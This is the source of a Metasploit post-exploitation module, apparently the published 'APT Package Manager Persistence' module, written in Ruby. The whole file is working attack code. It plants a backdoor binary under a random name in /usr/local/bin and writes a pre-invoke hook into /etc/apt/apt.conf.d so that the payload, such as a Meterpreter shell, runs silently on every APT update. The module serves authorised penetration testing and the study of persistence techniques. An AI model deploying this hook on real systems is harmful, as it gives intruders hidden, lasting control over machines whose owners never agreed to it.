1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8
  include Msf::Exploit::EXE
9
  include Msf::Exploit::FileDropper
10
  include Msf::Post::File
11
  include Msf::Post::Linux::System
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'APT Package Manager Persistence',
18
        'Description' => %q{
19
          This module will run a payload when the package manager is used. No
20
          handler is ran automatically so you must configure an appropriate
21
          exploit/multi/handler to connect. This module creates a pre-invoke hook
22
          for APT in apt.conf.d. The hook name syntax is numeric followed by text.
23
        },
24
        'License' => MSF_LICENSE,
25
        'Author' => ['Aaron Ringo'],
26
        'Platform' => ['linux', 'unix'],
27
        'Arch' => [
28
          ARCH_CMD,
29
          ARCH_X86,
30
          ARCH_X64,
31
          ARCH_ARMLE,
32
          ARCH_AARCH64,
33
          ARCH_PPC,
34
          ARCH_MIPSLE,
35
          ARCH_MIPSBE
36
        ],
37
        'SessionTypes' => ['shell', 'meterpreter'],
38
        'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => true },
39
        'DisclosureDate' => '1999-03-09', # Date APT package manager was included in Debian
40
        'References' => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
41
        'Targets' => [['Automatic', {}]],
42
        'DefaultTarget' => 0,
43
        'Notes' => {
44
          'Reliability' => UNKNOWN_RELIABILITY,
45
          'Stability' => UNKNOWN_STABILITY,
46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
47
        }
48
      )
49
    )
50

51
    register_options(
52
      [
53
        OptString.new('HOOKNAME', [false, 'Name of hook file to write']),
54
        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
55
      ]
56
    )
57

58
    register_advanced_options(
59
      [
60
        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
61
      ]
62
    )
63
  end
64

65
  def exploit
66
    hook_path = '/etc/apt/apt.conf.d/'
67
    unless writable? hook_path
68
      fail_with Failure::BadConfig, "#{hook_path} not writable, or APT is not on system"
69
    end
70
    hook_path << (datastore['HOOKNAME'] || "#{rand_text_numeric(2)}#{rand_text_alpha(5..8)}")
71

72
    backdoor_path = datastore['WritableDir']
73
    unless writable? backdoor_path
74
      fail_with Failure::BadConfig, "#{backdoor_path} is not writable"
75
    end
76
    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
77
    backdoor_path << backdoor_name
78

79
    print_status('Attempting to write hook:')
80
    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
81
    write_file(hook_path, hook_script)
82

83
    unless exist? hook_path
84
      fail_with Failure::Unknown, 'Failed to write Hook'
85
    end
86
    print_status("Wrote #{hook_path}")
87

88
    if payload.arch.first == 'cmd'
89
      write_file(backdoor_path, payload.encoded)
90
    else
91
      write_file(backdoor_path, generate_payload_exe)
92
    end
93

94
    unless exist? backdoor_path
95
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
96
    end
97
    print_status("Backdoor uploaded #{backdoor_path}")
98
    print_status('Backdoor will run on next APT update')
99

100
    # permissions chosen to reflect common perms in /usr/local/bin/
101
    chmod(backdoor_path, 0755)
102
  end
103
end
104

105